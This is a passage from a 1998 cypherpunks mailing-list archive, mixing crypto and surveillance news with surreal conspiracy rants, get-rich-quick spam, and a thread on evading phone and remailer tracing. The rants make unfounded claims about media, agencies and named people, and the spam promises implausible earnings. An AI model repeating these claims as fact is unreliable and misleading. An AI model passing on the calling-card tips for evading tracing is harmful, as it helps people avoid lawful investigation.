 to our universal remove list please go to remove@noic.org and your name will be added
 and distributed to all of our members
























ns
fn
38
294-n
c2
s




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@replay.com>
Date: Fri, 24 Apr 1998 06:06:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 666/0 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <35408DF6.5681@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Epilogue 666/0 -- SPACE ALIENS HIDE MY DRUGS!!!
_____________________________________________

Imagine:

  An average citizen legally ordering a variety of books from legitimate
mail-order publishers and distributors, such as Paladin Press,
Loopmatics, etc., and having the books sent to a private U.S. Postal
Service mailbox in Buttfuck, North Dakota.
  The citizen picking the books up late at night and stashing them in a
safe place before heading across the Canadian border in the middle of a
variety of late-night revelers returning from the Land of Cheap Drinks.
  Canadian Customs Agents tearing the citizen's vehicle apart, even
tearing open the seats, in an effort to search for some mysterious,
unnamed items of 'contraband'. (Even though they had not done this on
recent, almost daily, occassions when the citizen had crossed at the
same border station *without* picking up the books from the Post Office
box.)
  The citizen, years later, receiving confirmation from Canadian
Government documents of Customs agents knowledge of the specific
pseudonyms the various books were shipped to, which should have
theoretically only been known to the publisher and the USPS.
  The citizen, decades later, reading the court records surrounding a
lawsuit against one of the publishers, and drawing the conclusion that
the Stipulation of Undisputed Facts signed by the publisher seemed
designed to ensure that their case would be lost and thus set a
dangerous precedent in the legal wars being waged against freedom of
speech.
  The citizen having a long history of being paranoid...and right...


Imagine:
  A famous activist actress journeying to a Communist country to express
support for their cause of leftist world-domination at a time when her
democratic homeland was engaged in a massive war with that country.
  The actress marrying a like-minded individual who built a media-empire
capable of manipulating world-wide opinion in regard to wars being waged
by the former head of a secret intelligence agency who, upon becoming a
world-leader, espoused the need for a New World Order while justifying
world-wide military action under cover of joint actions with the United
Nations.
  The husband using the entertainment wing of his media-empire to
provide the citizenry with non-stop, repetitive propaganda illustrating
GoodGuys in law enforcement and the justice system violating
professional ethics, and the legal rights of BadCriminals, in the
interests of a Good Cause. (Can you say, "Matlock?" Sure, you can...) 
(Can you say, "Twenty-Four Hours of Eastwood," "Forty-Eight Hours of
Eastwood," "Four-Thousand Hours of Eastwood?" Sure, you can...)
  The husband donating a billion dollars of the money he earned
manipulating the news coverage of United Nations Police Actions
to...<gasp><surprise!>...the United Nations.


Imagine:
  A major new TV network springing up at a time when the BigThree no
longer seemed to be singing the tunes requested by the shadowy figures
from secret intelligence agencies who had been moved into industry
positions which controlled programming and schedules.
  Imagine that new network engaging in a successful march toward a
programming schedule geared toward promoting the existence of
extraterrestrial entities in our midst, and the safety of the citizens
being in the hands of armed, secretive federal government agents,
stop-search-and-seizure activities by armed local and state government
agents, video surveillance by government, law-enforcement, business and
private individuals.
  Imagine that network airing a story on May 7 which is designed to use
the individual heroism of the country's soldiers to gloss-over the fact
that their superiors threw them into a battle in which they could only
survive by engaging in the indiscriminant slaughter of men, women,
children and babies who rose to defend their homes and their country
from armed invasion by a foreign power.


Imagine:

  All major television networks, after receiving a gift of billions of
dollars of public digital airwaves, filling the airwaves with a plethora
of entertainment programs designed as propaganda to whitewash the images
of various sectors of the law enforcement community.
  The major networks providing their viewers with a wide variety of
entertainment and viewer-polls designed to suggest that their opinions
and beliefs matter, and can be adequately expressed by a phone call to
an 800 number, or by shouting along with the audience at an overweight,
communist skinhead who is beating up the sister he got pregnant for
having the Swastika tattoo surgically removed from the baby they stole
from a hospital maternity ward.


Imagine:
  Adam Shostack, sending a post to the CypherPunks list, "How I learned
to stop worrying and love anonymity," which was a clever take-off on
another post sent to the list which contained a movie-title from the
same era, "From Russia With Love."
  Adam's post being a tad 'too clever', since the 'other' post didn't
arrive on the list until over an hour later, although it had been sent
to the 'anonymous' remailer hours before Adam's clever mimicry was
composed.


Imagine:

  BadBillyG fleeing the country to avoid the potential MeatSpace threat
posed by a lunatic in a small prairie town who had driven past the local
liquor store while fiddling with his truck radio, and who continued on
across the country, through the heart of M$pace, on a soft-target tour
of North America.
  BadBillyG walking into an ambush halfway around the world, ending up
with more than one type of pie on his face.

Imagine:
  Reading Epilogue 666/0 of SPACE ALIENS HIDE MY DRUGS!!! and finally
seeing the true extent of the Evil, far-reaching Web of Conspiracy and
Dark Energy running throughout all of civilization, government and
society, only to realize that, in the end, it all matters very little in
comparison to the fact that the rent is due next Friday, your cat is
pregnant again, and you're wasting your time reading the mad ramblings
of an asshole who forged your name to a post to the CypherPunks list
which made you look like a fucking idiot.

Imagine:

  Yourself hitting the <Delete> key...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moms@uniquehawaii.com
Date: Fri, 24 Apr 1998 06:06:09 -0700 (PDT)
To: mothersday98@hotmail.com
Subject: Gifts from Hawaii for Mother's Day
Message-ID: <199804241128.HAA26049@mail.oeonline.com>
MIME-Version: 1.0
Content-Type: text/plain


Aloha,
HAWAII NANI is pleased to offer you unique, made-in-Hawaii gifts that convey
the sense and spirit of Aloha and are very special ways to say "I love you"
on Mother's Day. May we suggest:

ISLAND FLOWER PERFUMES WITH UNIQUE CARD $24.95. Hearts and flowers decorate
this original cover of Mom's card.  And in a hand woven palm-frond "lauhala"
basket, decorated with lively Hawaiian print wrappings and bow, we offer two
unique perfumes of Hawaii.The gentle lavender and light yellow colors of the
Orchid have made it the royal flower of the Islands and inspired our
Hawaiian Orchid light perfume. The velvety yellow and creamy white petals of the lovely Plumeria
yield a soft fragrance reminiscent of the traditional flower lei of the
Islands and inspire our second delightful perfume. Both in soft spray and
made with Aloha, exclusively in Hawaii.  

ISLAND COFFEE BASKET  $19.95 In a "lauhala" basket, two bags of fine
grind,choice estate coffees from the upland plantations of Hawaii and a full
bar-be-que apron of quality cotton in traditional Hawaiian Tapa design or
our DELUXE COFFEE BASKET for $29.95 which also includes four distinctive
cotton Tapa dinner napkins and three bags of very special Hawaiian grown
coffee. 

LOVELY MALIA  $19.95.  A unique rag doll for little girls of all ages. Malia
is a raggedy island girl in a colorful Muumuu, the beautiful dress of
Hawaii. She's 20 inches long, has big, warm eyes and just wants to be
hugged. Malia owns no cars or appliances but she comes in her own "lauhala"
travelling basket and brings Aloha. Lots of it.   

May we airmail a fine Hawaiian gift  to you, or directly to that special
person ? We'll hand sign the gift card when you send a loving touch of
Aloha. Complete the form below and mail your order to: 

HAWAII NANI   PO Box 61928       Honolulu, HI   96839
    _____________________________________________________________________
YES, I want to send a Touch of Aloha. Please send by Priority Mail (cost
included)*

_____ISLAND FLOWER PERFUMES   $24.95
_____ISLAND COFFEE BASKET         $19.95 
_____DELUXE COFFEE BASKET        $29.95
_____LOVELY MALIA RAGDOLL         $19.95

I HAVE INCLUDED    $___________  . Priority Mail my Aloha gift to:

NAME___________________________________  
ADDRESS________________________________
CITY, STATE, ZIP_______________________ SIGN IT:from__________________  

Send US currency, check or MO only [outside US add $4.00 S/H per package].
Please include your Email address ______________.  Your ALOHA gift will fly
within five days of our receipt of your order. Look for other fine offerings
from Hawaii at our new webstore opening soon at: www.hawaiinani.com. If our
message has reached you in error we apologize. Aloha and Mahalo.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 24 Apr 1998 07:07:47 -0700 (PDT)
To: inter@technologist.com
Subject: SHIFT REGISTER technology
Message-ID: <35409B14.3D9B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 4/24/98 7:33 AM

John Young
J Orlin Grabbe
John Gilmore

The stuff on linear and non-linear shift register sequences which is now
appearing on jya.com is the 'military-grade' crypto technology.

Semionoff and http://www.jya.com/crack-a5.htm contains material similar
to 
what I saw Brian Snow present in schematics of NSA KG units.

The statement by david.loos@eudoramail.com

  The A5 algorithm uses a three level, non-linear feedback shift
  register arrangement, designed to be sufficiently complex to resist
  attack.

points to the technology used for military-grade crypto.

The reason NSA regarded the R register, seen at
http://jya.com/whpfiles.htm,
feedback function classified was that it contained a non-linear feedback
function.  

I was ORDERED to build UNCLASSIFIED hardware.  This is why I stuck the R
register
feedback function in a fast ram.

This similarity between the structure of the nonlinear feedback function
in the 
CAVE algorithm seen at 

  http://www.semionoff.com/cellular/hacking/phreaking/

to the feedback function published in my SAND report

: A11   A1 A5 AND
        A1 0= A9 0= AND XOR
        A6 A10 XOR XOR ;

reveals  "military-strength" technology.  

SHIFT REGISTERS.

Words 'shift registers' also caused the Great American Spy Sting bust.

        http://caq.com/CAQ/caq63/caq63madsen.html


The Cold War is over.  And the crypto cat is now about fully out of the
bag.

Let's hope for settlement so that we can all go on to more constructive
tasks.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Fri, 24 Apr 1998 05:35:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: corvette.bxa.doc.gov
Message-ID: <Pine.LNX.3.96.980424081422.19630A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This morning I was going through my logs and I saw an anonymous ftp
connection to my machine, which ordinarily I wouldn't care about.. I
distribute my RSA keys from this machine.. but the connection was
from corvette.bxa.doc.gov, so I looked further at the FTP commands
issued and it looks like a bot. 

Several instances of "SIZE", even on directory names; it recursed into
the tree got some smaller files and that was it. 

So, I went sniffing. www.bxa.doc.gov:

"		Bureau of Export Administration Home Page

   The Bureau of Export Administration enhances the nation's security and
   its economic prosperity by controlling exports for national security,
     foreign policy, and short supply reasons. We administer the Export
     Administration Act by developing export control policies, issuing
   export licenses, and prosecuting violators. "

A quick web search for corvette.bxa.doc.gov brought up several "web
statistics pages" .. it crawls all over the place. It seems as if it
targets technical sites. 

I just thought you guys might like to hear about it. If anyone needs
anymore info, or wants the sections from my logs just let me know.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..subordination of one sex to the other is wrong in itself, and now
one of the chief hindrances to human improvement.." John Stuart Mill
"The Subjection of Women"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNUCFIAKEiLNUxnAfAQFa0gP+LiSSMOy5kNi7nmxitrcO5xv1pbk3nWRk
rW984qlAr+1Y9PKAIrkSboT239RJb2L2+JYlCUvYxt7CeZMCHcjtrcbrxjiUxKeL
Vk6z/31BetWNkilE+fizfOHwhHnnHaJ8PgAlPGjmByjNQAHXSRBMZ1m00Z4hDl6w
TnM80Cds2BQ=
=J5FV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 24 Apr 1998 07:11:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FBI Sued on CALEA
Message-ID: <199804241410.KAA19230@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT's John  Markoff reports today on a suit to be filed 
today by the cellular phone industry against CALEA regs 
on wiretapping -- alleging improper FBI guidelines under
the legislation. A lead on getting a copy of the filing would 
be appreciated; U.S. District Court in Washington DC is
the venue.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 24 Apr 1998 08:09:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Programmers flee Y2K problem -- and we're spooked too
In-Reply-To: <199804241433.QAA08228@basement.replay.com>
Message-ID: <199804241509.LAA17071@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Didn't Hal Finney recently debunk Y2K apocalyptic millenarianism?

Or is Y2K-mongering now competing with the elint industry for more 
domestic preparedness for techno-seancing, tap, tap, tap?

Pray 00-00-00 unplugs the global Echelons.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 24 Apr 1998 02:39:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Traceability of Calling Cards, Phones, Remailers
Message-ID: <199804240939.LAA03555@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
> At 12:27 PM -0800 4/23/98, Anonymous wrote:
> >Keep in mind that Timothy McVeigh thought he had anonymity with his
> >use of a prepaid 'anonymous' phone card over public payphones. He was
> >wrong. 

> If I recall correctly, they determined that the same calling card was used
> to call various places. Once they had identified the card, correlation was
> easy.

It is even easier to track in real-time if one has prior information
in regard to the possessession of such 'anonymous' instruments, either
through in-place informants on either end (or both ends) of the
transaction.

> What I took from this was the advisability of buying a dozen or so cheap
> prepaid cards, from a machine dispenser or shrinkwrap/cardpack untraceable
> sale, and then not use any single card over and over again.

  Mr. May is astute enough to recognize that law enforcement agencies
are fully capable of reading (or writing) the same guerrila-outlaw
how-to books and manuals available to would-be anonymous activists, and
that it is dangerous for an individual to fail to use their own wit
and wisdom to add additional layers of protection and deception to
guerilla methods commonly championed.
  e.g. - a 'known plaintext' becomes one-step deeper when translated
into an unfamiliar language.

> >It is highly unlikely that electronically-based 'anonymous' technology
> >is going to be any more untracable than meatspace-disseminated tools
> >of anonymity.
 
> With all due respect, I think you're talking out of your ass on this one.

  One should be careful about insulting people named 'Anonymous', since
we come from such a large family...

> The math of tracing messages routed through a network of N selected
> remailers each properly executing a remailer protocol (e.g., accumulating M
> messages, encryption at each stage, etc.) is far, far stronger than
> anything McVeigh was using.

  Very true, but I was thinking more in terms of the pre-existing
compromise of the tools of anonymity which will be offered/marketed
to the masses.
  e.g. - Decades ago, after picking up a book order from Loompmatics
which I had sent to a cold-address (USPS), I shortly thereafter watched
in amusement as border-guards tore my vehicle apart looking for material
that they theoretically were not supposed to know I had taken possession
of, not knowing that my 'unreasonable' paranoia had resulted in my 
making a 'test run' before crossing the border with them.

 > I had hoped there would be many more remailers in use by the time the
next
> Big Event happened and involved remailers, but it appears remailers are
> spreading slowly and the pressure cooker is reaching the bursting point for
> more patriot or militia or terrorist actions.

  There are many more remailers in existence than is readily apparent.
The Winsock remailer software, for instance, has been modified to
allow 'clustered' remailers to exist on a single server, wherein a
number of individuals can channel their email to a separate in-house
remailer designed to give them an outgoing consistent persona that
is not traceable to their incoming message through ordinary man-in-
the-middle tracking.

Totoally Anonymous






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 24 Apr 1998 02:40:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 5/0 -- SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <199804240940.LAA03770@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Epilogue 5/0 -- SPACE ALIENS HIDE MY DRUGS!!!
_____________________________________________


A REPTILIAN NAZI WHO NARROWLY ESCAPED BEING MADE
INTO A PAIR OF BOOTS WHILE TRAVELLING THROUGH
TEXAS wrote:

> Hello, Toto...this is just a friendly response.  You sound just like I did
> when I was first exposed to Illuminatus! and Mexico City Blues...both really
> nifty books.

  Wow. You must have been some sick puppy...
 
> The whole reason I got involved in government work at all was because I needed
> to find out what it was all about, and I grant you, it's VERY EASY for a good
> "social engineer" to warp the living dogshit out of any organization, because
> the more hierarchical a structure, the fewer variables you have in bending it
> to your will.

It was this very Prince Apia of Physics that allowed Linda McCartney to
be secretly buried as an imaginary driver in the log book of a finely
tuned Volkswagen with a fifth-wheel which could be retracted when
outside the jurisdiction of the Kansas Control Commission, thus allowing
the Bug to be hidden outside of the prying blinds of the papparazzi,
whose long, reptilian tongues were busy snapping at fruit's flies.

> This all makes sense...BUT...this is America, and, as this mailing list
> illustrates, our population is not so easily subdued.  In my not-so-humble
> analysis (as a loud-mouthed student of propaganda), great propagandists like
> Ayn Rand and a few others gave essentially shielded us from herd-responses
> on a government scale.  

  Ayn Rand's 'propaganda' apparently didn't shield us well enough from
herd-responses to keep her books off of the best-seller lists, while
*real* classics such as 'Thinker Dumped' were used to prop up the corner
of couches around the nation.

> This is entirely unprecedented (and kicks ass)
> because we have an ACCEPTED CULTURE of resistance against any unnecessary
> controls.
 
  However, one needs to keep in mind that top government officials and
members of the military are being provided innoculation to provide them
with resistance to the cultures that they experiment with, while making
them illegal for the average bean-counter to possess.

> There will always be regulation-mongers who try to pull shit like the War on
> Drugs, but, as you can see, they lose public support *really* fast.  

  Lack of public support does not seem to prevent the regulation-mongers
from continuing their various forms of the War on Drugs over the course
of hundreds of years, while imprisoning and killing large numbers of
citizens, in the process.

> I don't
> know anyone in the military...INCLUDING people who are assigned to the "War on
> Drugs"...who think this is a good idea.  Friends of mine who have gone on
> missions to assist in drug-siezing have outright stated that they were going
> to watch for "stupid-shit" of which we all know law enforcement officials to be
> capable.

  And I don't know anyone in a child-sex ring...INCLUDING those who only
hold them down...who think this is a legal activity. Friends of yours
who have gone on missions to assist in child-seizing have outright
stated that they were going to watch for holes in the condoms being
used. "If it saves the life of a single child..."
 
> In other words, keep your head...because as you begin to fear imagined threats,
> you're much less "on guard" against REAL threats to your individuality.

  I've been keeping my head in glass canning jars, and so far I have
enough saved up to hold out for forty days and forty nights if the Y2K
Volkswagen results in a shortage of Tequila, Kahlua and Cream.
  I, and countless other citizens, are fully capable of dealing with the
REAL threats which life serves up on a daily basis. The 'imagined'
threats are the ones that truly need to be guarded against, as they are
the ones that the Oppressor uses most effectively to crush both the
spirit and verse of the Constitution.

> Hopefully, this rather opinionated little comment hasn't offended you too
> terribly.

  Well, I am rather thin-skinned, but at least I'm not thin-scaled...
 
> (Of course, I am aware that your response to my description of the reality of
> modern warfare could have been humorous, but I know some people actually think
> that there's some gigantic organized conspiracy to fuck with their heads.

  Some of the more mentally unstable of those indivdiduals actually
believe that they are receiving secret messages through their
televisions from large-breasted women who are attempting to sell them
fast cars, toothpaste and other consumer goods.

> There ARE a lot of tiny organized conspiracies, but you'd be bloody shocked
> to find out how little influence they really have.)

  Certainly not as much as the 'large' organized conspiracies...
 
> Tossing a golden soccer ball marked "Khallisti",
> Dxmxtxy

Tossing a golden lager marked "Pilsner",
Txtx





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 24 Apr 1998 12:08:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Programmers flee Y2K problem -- and we're spooked too
In-Reply-To: <199804241509.LAA17071@camel7.mindspring.com>
Message-ID: <199804241908.PAA07891@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's a Y2K contribution:

Date: Tue, 14 Apr 1998 13:49:00 -0600
From: Jim Burnes <jim.burnes@ssds.com>
To: John Young <jya@pipeline.com>
Subject: Re: Would you like to archive something for me?
References: <199804091755.NAA32193@camel7.mindspring.com>
<199804141929.PAA08881@dewdrop2.mindspring.com>
Content-Type: multipart/mixed; boundary="------------F5AD0F1DF82F490B65FEDE20"

Ok, here it is (the largest attachment I've done so far ;-) [See end]

Here is the skinny....

IRS is going to award the contract for its Y2K remediation
sometime in October, which is of course a joke.  By most
estimates they have on the order of 100million lines of
code to fix, much of it flakey and undocumented.  Any
Autocoder programmers left?  Anyway, the CIO of the
IRS quit recently and this file (prime.pdf) was his plea
for help before he left and bought gold or something.

If you go to the IRS page that Gary North references
this document is just plain gone.  Its extremely telling
if you look at the data flow diagrams for IRS administrative
systems.  Its so huge that a I had to zoom in 4 or 5 times
before subsystem names started to resolve.  I downloaded this
when it was posted because after reading it I knew someone
would eventually yank it.

Jim

PS: Some quick math: 100 million lines of code/1 million
lines per year = 100 years to fix.  1 million lines
per year is how fast the Social (in)Security Administration
was able to fix their code and even they won't be
compliant.  ;-)

Feel free to post this message (but not the attachment ;-)
to cypherpunks.

-- 

----------

What Jim sent is the May 1997 IRS RFC which shows 
the stypefying complexity of the IRS computer octupus 
and daunting job of fixing Y2K. It is in PDF format, 
1,248K in size:

     http://jya.com/prime.pdf

----------

The cause of bizarro endings is due to writing holding breath 
to assure short messages to please fast-glance Palm Piloters. 
Consider the last 2/3s as read to the silly end sigs for Lazy Boy 
broncos with nothing better to read, like Tim's blinking single 
liners for presenescent presbyopics.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 24 Apr 1998 07:37:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cutoff Date
Message-ID: <199804241437.QAA09658@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


ftp://billstatus.ls.state.ms.us/1998/HB/0100-0199/HB0196IN.htm

MISSISSIPPI LEGISLATURE

1998 Regular Session

To: Judiciary A

By: Representative Moak

                              House Bill 196

AN ACT TO AUTHORIZE THE REMOVAL OF A BODY PART IN LIEU OF OTHER
SENTENCES IMPOSED BY THE COURT FOR VIOLATIONS OF THE CONTROLLED
SUBSTANCES LAW; AND FOR RELATED PURPOSES. 

BE IT ENACTED BY THE LEGISLATURE OF THE STATE OF MISSISSIPPI:

SECTION 1. In lieu of any other penalty prescribed by law, the court may
allow any person who is
convicted for a violation of the Controlled Substances Law to have a
body part removed. The
convicted person and the court must agree on which body part shall be
removed.

SECTION 2. This act shall take effect and be in force from and after
July 1, 1998.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg McCollum <ozone1@aloha.net>
Date: Sat, 25 Apr 1998 08:39:34 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: Reality $trikes $BIG$
Message-ID: <199804251539.FAA29953@haleakala.aloha.net>
MIME-Version: 1.0
Content-Type: text/plain



Are you ready for this?

$9,742 in One Week IS a Reality in REAL, HONEST, and PRACTICAL business!
Take 30 seconds and change your life! You'll be on your way to Financial Freedom and peace of mind in minutes..... http://www.moneymania.com/madpack.htm 

Enjoy the ride! Call anytime 808 263-6954!

Greg







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wowitworks@yahoo.com
Date: Sat, 25 Apr 1998 08:41:48 -0700 (PDT)
Subject: Your dreams can come true
Message-ID: <199804251541.IAA02490@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from future emails simply email 
promote@mail.vicom.net  thank you

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



FROM THE DESK OF THE WEALTH COACH:

Dear Fellow Networker,

BEWARE!   DO NOT READ THIS UNLESS YOU ARE READY
                      TO CHANGE YOUR LIFE FOREVER!

A group of millionaires just launched a program with a proven 
success plan that could make you a millionaire within 12 months 
BY LEARNING HOW TO DO WHAT THEY DO!

Would you like to build a Financial Empire?
Would you like to end your money pressures forever?
Would you like to have A PERSONALLY FULFILLED LIFE?
Would you like to have Every Thing YOU EVER DESIRED?

If you said "YES" to any of these then let me show you how to 
begin to live your dreams in 1998!  I know this sounds too good 
to be true.  Frankly, I didn't believe it myself at first.  
Finally I agreed to check it out.  After I heard about the way 
this is changing average men and women's lives, Personally and 
Financially, I jumped in and now I say,  
                            "IT IS GOOD ENOUGH TO BE TRUE"

Are you ready to change your Life Forever?
It would make me very happy to show you how, but only if you're 
interested enough to rush to make one free telephone call Now!
1-888-818-7066
If you like what you hear then leave your name and phone number
And I will immediately call and  give you all you will ever need 
to be 
Personally & Financially Successful.

You have nothing to lose and everything to gain.  This may be the 
answer you have been seeking.  It was the answer to all my 
prayers.

Richly Yours,
The Wealth Coach

P. S. You will kick yourself if you miss out on this!  
For the NEXT Step... Call me at 1-888-293-6760 ext. 00253 
Email me at wealthcoach@mail.vicom.net
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VeriSign Customer Service <id-center@verisign.com>
Date: Sat, 25 Apr 1998 07:27:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Secure your E-mail with your Digital ID
Message-ID: <199804251426.HAA24586@toro-cm3.verisign.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear VeriSign Digital ID Holder:
 
We hope that you have been enjoying the security and convenience of
your Trial Digital ID. Our records indicate that your Digital ID will 
expire in 7 days. If you haven't already, please visit 
http://www.verisign.com/renewal to get a new ID to enjoy uninterrupted
security.  

By upgrading to a Full Service Digital ID, you not only have the ability
to digitally encrypt and sign your e-mail messages for privacy over the 
Internet, but also receive the following premium benefits:

- Provides $1000 of NetSure(sm) protection for online commerce 
transactions
- Allows for ID cancellation and reissuance in case of loss or overwriting
on your computer
- Inclusion in online ID directories, allowing friends and colleagues to 
send you encrypted e-mail
 
Thanks again for choosing VeriSign. We look forward to serving your
future electronic commerce and communications needs.
 
VeriSign Customer Service






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: planet@search-engine-help.com
Date: Sat, 25 Apr 1998 15:11:34 -0700 (PDT)
Subject: your web site...
Message-ID: <199804252207.PAA03588@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain




Would you like to improve your website's "find-ability" in
the Search Engines?

During the past two years, my company has been placing
hundreds of webpages into the Top Ten -- the front page --
of the major search engines... and for a small fee, I
will show you how we do it... and I'll share with you our
ongoing research -- every month!

My name is Stephen Mahaney. I am the president of Planet
Ocean Communications. My web marketing company has literally
"written the book" on how to position your website on the
front page -- the Top Ten -- of each of the major search
engines... guaranteed!

Our 65 page manual identifies every trick & technique that
is being used on the Internet to gain an almost "unfair"
advantage in landing websites at the top of the search
engine lists -- right where you need to be so that potential
customers who are seeking your services or products can find
you.

Our monthly Newsletter keeps you abreast of the latest
techniques and frequent changes that take place in the
dynamic world of "search engine" science.

However, understanding the process does not require a degree
in "rocket" science -- nor do you need to be "technically
oriented". Whether your website is a "do-it-yourself"
project or you are paying someone to maintain your site, you
(or your webmaster) need to know the tricks in this book in
order to compete with the professionals who are dominating
the front pages of the various search categories.

To learn more about how you can obtain this essential
information and receive a free subscription to our
Newsletter -- SEARCH ENGINE SECRETS UPDATE, go to....

  http://www.searchenginetips.com/se-listing/

You'll be glad you did.

Sincerely, 
Stephen Mahaney - President 
Planet Ocean Communications


***************************************************
Note: We have contacted you based on information that we
gathered while visiting your website - If you would prefer
not to receive mail from us in the future, simply reply with
the word "remove" in the subject line and you will be
automatically excluded from future correspondence. Thanks
***************************************************

Thought for the day... 
"The only thing a man can take
beyond this lifetime is his ethics"
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdewayne@yahoo.com
Date: Sat, 25 Apr 1998 12:02:01 -0700 (PDT)
Subject: INTERNET SERVICE Without a computer
Message-ID: <199804251901.MAA03353@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from future emails simply email 
promote@mail.vicom.net  thank you

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Simply the BEST

Internet access available today!!

26 years as an Internet Network Provider

No Downtime in over 5 years

Triple redundancy (backup)

Virtually no busy signals - 10:1 modem to user ratio

Latest technology: http://www.e-push/~jl
send receive email without a computer

$1900 in value-added benefts for GOLD & Platinum subscribers FREE

Service Packages
SILVER- Internet service
	$19.95 per month unlimited access
		POWERperks benefits - $149 software-free

GOLD- e-PUSH & e-STAT
	$14.95 per month plus 25cents per minute
		NETperks - $1900 worth of value-added 		
benefits - FREE

PLATINUM - The works
	$24.95 per month
		Internet service
		e-PUSH and e-STAT
		POWERperks benefits - $149 software-free
		NETperks - $1900 worth of value-added 		
		benefits - FREE

to see how you can get this service NOW!!!
look us up at hitek.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@spe.com
Date: Sun, 26 Apr 1998 06:06:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NT
In-Reply-To: <19980416032558.6663.qmail@nsm.htp.org>
Message-ID: <4155-Sat25Apr1998143656-0700-pjm@spe.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@nsm.htp.org writes:
 > Anyone know how to completely crash a NT
 > workstation with no possibility of recovery?

     Boot it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Sat, 25 Apr 1998 12:36:13 -0700 (PDT)
To: jim@mentat.com (Jim Gillogly)
Subject: Re: IRS cratering
In-Reply-To: <9804251705.AA06849@mentat.com>
Message-ID: <19980425153547.A6607@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, Apr 25, 1998 at 10:05:09AM -0700, Jim Gillogly wrote:
> 
> > Similar efforts in the past to modernize the FAA have failed...as someone
> > noted, the FAA and control towers are still dependent on vacuum tube
> > computers. The problem lies not with finding newer computers, but with the
> > software for the many subsystems, displays, communcations links, radars,
> 
> Is this really true?  They do have obsolete vacuum tube equipment, but
> I thought it was all radars and radios rather than computers.  The up-side
> of it is that vacuum tubes are more resistant to EMP than silicon... but
> I'm pretty sure that's not why they're still using them.
> 
	IEEE Spectrum of ran a story on this last year.  Apparently they
do have some vacuum tube radio, audio and radar gear, but all the
computer systems in use are solid state such as antique 360s and the
like with lots of custom interfaces that can't be readily replaced.  And
much of the software is such patched spaghetti that nobody has been able
to reimplement it.   But telling is the fact that most of the radar
display consoles are late 60s designs manufactured in the early 70s with
a 5-10 year expected lifetime, and wires and connectors and other parts
not normally replaced in the field are getting brittle with age after
20-25 years of continuous operation at temperature.  And maintaining them
and the computers is made harder each year by the increasingly total 
unavailibility of electronic components of the types used back then...


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Success@mauimail.com
Date: Sat, 25 Apr 1998 16:33:35 -0700 (PDT)
To: associates@success1.com
Subject: Certified mail
Message-ID: <199804252329.HAA25154@pop2.pacific.net.sg>
MIME-Version: 1.0
